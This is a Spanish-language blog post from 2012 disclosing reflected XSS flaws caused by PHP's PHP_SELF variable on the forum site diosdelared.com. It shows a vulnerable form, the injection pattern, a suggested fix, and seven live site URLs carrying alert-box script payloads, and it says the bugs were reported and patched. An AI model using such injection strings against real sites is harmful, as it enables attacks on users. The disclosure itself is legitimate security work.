XSS PHP_SELF en Diosdelared

Tecleado por Maztor On 17:44
Bueno mi compañero "DEDALO" "SEGURIDADBLANCA" me comento al DM de TT sobre unos XSS aqui en DDLR, al ver estos noté que eran los mismos que yo habia encontrado en otras rutas, analizando muy bien su estructura se pudo decir.. es XSS en PHP_SELF.

Hablemos un poco de PHP_SELF.
Es una de las variables predefinidas de PHP ya OBSOLETA

El nombre de archivo del script ejecutándose actualmente, relativo a la raíz de documentos. Por ejemplo, $_SERVER['PHP_SELF'] en un script en la dirección http://example.com/test.php/foo.bar sería /test.php/foo.bar. La constante __FILE__ contiene la ruta completa y nombre del archivo actual (es decir, incluido).

Si PHP está siendo ejecutado como un procesador de línea de comandos, esta variable contiene el nombre del script a partir de PHP 4.3.0.

http://www.php-es.com/reserved.variables.html

Esta variable es muy usada.. y muy insegura, comunmente utilizada para apuntar los formularios hacia la misma página.

=====================
Ejemplo:
=====================


   <form action="<?=$PHP_SELF?>">
   <input type="hidden" name="submitted" value="1" />
   <input type="submit" value="Submit!" />
  </form>
 </body>
</html>


===================
Explotacion
===================

/usandophpself.php/">[JS MALICIOUS CODE]

=================
Resultado
=================

<form action="/raiz/usandophpself.php/"><script>alert('XSS PHP_SELF')</script><foo">
   <input type="hidden" name="submitted" value="1" />
   <input type="submit" value="Submit!" />
  </form>
 </body>
</html>

========================
Posible Fix
========================

$_SERVER['SCRIPT_NAME']

Hace Referencia tambien a: $_SERVER['PHP_SELF']

========================================

Archivos [RUTAS] Vulnerables
========================================

    www.diosdelared.com/home/register.php/"><script>alert('XSS');</script> 
    www.diosdelared.com/home/login.php/"><script>alert('XSS');</script>
    www.diosdelared.com/foro/index.php/"><script>alert('XSS');</script>
    www.diosdelared.com/home/index.php/"><script>alert('XSS');</script>
    www.diosdelared.com/blogs/admin.php/"><script>alert('XSS');</script>
    www.diosdelared.com/torneos.php/"><script>alert('XSS');</script>
    www.diosdelared.com/ayuda.php/"><script>alert('XSS');</script>

================================================
Creditos 3 Dedalo - 4 MaztoR
================================================


Los bugs han sido Reportados a MurdeR y parchados!

/* RETO "Encuentra un XSS en DDLR" */ CRASH WIN!

3 Responses to 'XSS PHP_SELF en Diosdelared'

  1. Anónimo said...
    http://www.maztor.com/2012/05/xss-phpself-en-diosdelared.html?showComment=1341499179586#c7646960151044846956'> 5 de julio de 2012, 7:39

    ok

     

  2. Anónimo said...
    http://www.maztor.com/2012/05/xss-phpself-en-diosdelared.html?showComment=1341499204886#c6988432650138904638'> 5 de julio de 2012, 7:40

    hola m4ztor que paso con diosdelared by h4x0r

     

  3. Maztor said...
    http://www.maztor.com/2012/05/xss-phpself-en-diosdelared.html?showComment=1341501898862#c6614330867257828975'> 5 de julio de 2012, 8:24

    Al parecer MurdeR ha cerrado el sitio.

     

Publicar un comentario en la entrada

Related Posts Plugin for WordPress, Blogger...
Sigueme en Twitter

Qr-c0de Url Blog

Suscribirse al blog

Ingresar Email

¡Recomendar! y RSS